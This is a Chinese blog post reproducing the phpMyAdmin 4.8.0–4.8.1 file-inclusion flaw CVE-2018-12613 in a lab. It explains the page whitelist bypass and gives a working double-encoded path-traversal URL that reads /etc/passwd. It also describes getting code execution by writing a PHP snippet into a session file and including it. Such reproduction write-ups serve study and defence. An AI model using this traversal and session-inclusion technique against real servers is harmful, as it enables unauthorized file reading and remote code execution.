phpmyadmin(CVE-2018-12613)文件包含漏洞复现

phpMyAdmin是一套开源的、基于Web的MySQL数据库管理工具。其index.php中存在一处文件包含逻辑,通过二次编码即可绕过检查,造成远程文件包含漏洞。

受影响的版本

phpMyAdmin

4.8.0

4.8.1

漏洞复现

环境开始后,请访问。phpmyadmin 是"config"模式,因此我们可以直接登录。http://your-ip:8080

 

在index.php中已经定义好了target_blacklist的值,它们是import.php和export.php,只要不等于这两个值就可以。

如果page在白名单中就会直接 return true

白名单如下

 1      'db_datadict.php',
 2      'db_sql.php',
 3      'db_events.php',
 4      'db_export.php',
 5      'db_importdocsql.php',
 6      'db_multi_table_query.php',
 7      'db_structure.php',
 8      'db_import.php',
 9      'db_operations.php',
10      'db_search.php',
11      'db_routines.php',
12      'export.php',
13      'import.php',
14      'index.php',
15      'pdf_pages.php',
16      'pdf_schema.php',
17      'server_binlog.php',
18      'server_collations.php',
19      'server_databases.php',
20      'server_engines.php',
21      'server_export.php',
22      'server_import.php',
23      'server_privileges.php',
24      'server_sql.php',
25      'server_status.php',
26      'server_status_advisor.php',
27      'server_status_monitor.php',
28      'server_status_queries.php',
29      'server_status_variables.php',
30      'server_variables.php',
31      'sql.php',
32      'tbl_addfield.php',
33      'tbl_change.php',
34      'tbl_create.php',
35      'tbl_import.php',
36      'tbl_indexes.php',
37      'tbl_sql.php',
38      'tbl_export.php',

 

我们直接访问http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd

 

 

我们通过包含session临时文件来实现命令执行 执行一个SELECT '<?php phpinfo(); ?>' 命令然后查看session值来访问临时文件

 

 

 

访问该临时文件,发现命令执行成功 

 

posted @ 2021-05-23 14:32  whited  阅读(580)  评论(0编辑  收藏  举报